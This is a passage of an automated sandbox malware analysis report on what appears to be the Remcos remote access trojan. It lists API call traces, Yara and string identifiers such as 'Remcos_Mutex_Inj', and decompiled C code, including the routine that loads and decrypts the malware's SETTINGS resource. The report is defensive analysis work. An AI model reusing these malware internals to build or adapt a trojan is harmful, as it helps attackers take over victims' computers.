                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                  • wcslen.MSVCRT ref: 004090DB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                    • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                    • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                    • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                    • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                  • wcscpy.MSVCRT ref: 00409230
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                  • atoi.MSVCRT ref: 00409391
                                  • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                  • atoi.MSVCRT ref: 00409540
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                    • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                    • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                    • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                    • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                    • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                  • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                  • API String ID: 1672879135-1557472714
                                  • Opcode ID: 29ac0dad2c791b8b19860c1f76644832782db97cd54db988fe52e447018da257
                                  • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                  • Opcode Fuzzy Hash: 29ac0dad2c791b8b19860c1f76644832782db97cd54db988fe52e447018da257
                                  • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6B015DF0), ref: 00412A90
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                  • String ID:
                                  • API String ID: 3435050692-0
                                  • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                  • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				int _v100;
                                  				char** _v104;
                                  				int _v108;
                                  				void _v112;
                                  				char** _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				intOrPtr* _t24;
                                  				void* _t27;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t54;
                                  				intOrPtr _t57;
                                  				intOrPtr _t60;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x416e50);
                                  				_push(0x414130);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t57;
                                  				_v28 = _t57 - 0x68;
                                  				_v8 = 0;
                                  				__set_app_type(2);
                                  				 *0x41c26c =  *0x41c26c | 0xffffffff;
                                  				 *0x41c270 =  *0x41c270 | 0xffffffff;
                                  				 *(__p__fmode()) =  *0x41c264;
                                  				_t24 = __p__commode();
                                  				_t47 =  *0x41c260;
                                  				 *_t24 =  *0x41c260;
                                  				 *0x41c268 = _adjust_fdiv;
                                  				_t27 = E00404F3A( *_adjust_fdiv);
                                  				_t60 =  *0x41b190; // 0x1
                                  				if(_t60 == 0) {
                                  					__setusermatherr(E0041412C);
                                  					_pop(_t47);
                                  				}
                                  				E0041411A(_t27);
                                  				_push(0x41b0e8);
                                  				_push(0x41b0e4);
                                  				L00414114();
                                  				_v112 =  *0x41c25c;
                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
                                  				_push(0x41b0e0);
                                  				_push(0x41b000); // executed
                                  				L00414114(); // executed
                                  				_t54 =  *_acmdln;
                                  				_v120 = _t54;
                                  				if( *_t54 != 0x22) {
                                  					while(1) {
                                  						__eflags =  *_t54 - 0x20;
                                  						if(__eflags <= 0) {
                                  							goto L7;
                                  						}
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  					}
                                  				} else {
                                  					do {
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  						_t42 =  *_t54;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t54 == 0x22) {
                                  						L6:
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  					}
                                  				}
                                  				L7:
                                  				_t36 =  *_t54;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96);
                                  				_t68 = _v96.dwFlags & 0x00000001;
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
                                  				_v108 = _t40;
                                  				exit(_t40); // executed
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L0041410E();
                                  				return _t41;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                  • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00409823(intOrPtr _a4) {
                                  				unsigned int _v8;
                                  				signed char* _v12;
                                  				char _v13;
                                  				void* _v20;
                                  				void* _v24;
                                  				char _v40;
                                  				void* _v56;
                                  				char _v1080;
                                  				void* _t36;
                                  				signed int _t38;
                                  				signed int _t42;
                                  				int _t51;
                                  				signed int _t54;
                                  				signed int _t55;
                                  				signed int _t66;
                                  				signed char* _t76;
                                  				void* _t83;
                                  				void* _t88;
                                  				void* _t89;
                                  
                                  				_v12 = _v12 & 0x00000000;
                                  				_v8 = E00409D02( &_v12);
                                  				_t51 =  *_v12 & 0x000000ff;
                                  				_t36 = malloc(_t51);
                                  				_t76 = _v12;
                                  				_t54 = _t51;
                                  				_t7 = _t76 + 1; // 0x1
                                  				_t88 = _t7;
                                  				_v24 = _t36;
                                  				_t55 = _t54 >> 2;
                                  				memcpy(_t36, _t88, _t55 << 2);
                                  				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13); // executed
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
                                  				_t83 = malloc(_v8);
                                  				_t42 = _v12;
                                  				_v20 = _t83;
                                  				_t20 = _t42 + 1; // 0x1
                                  				_t89 = _t51 + _t20;
                                  				_t66 = _v8 >> 2;
                                  				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
                                  				E00402F9B( &_v1080, _v24, _t51);
                                  				E0040309E( &_v1080,  &_v40, _v20, _v8);
                                  				free(_v20);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _a4;
                                  			}

                                  APIs
                                    • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                    • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                    • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
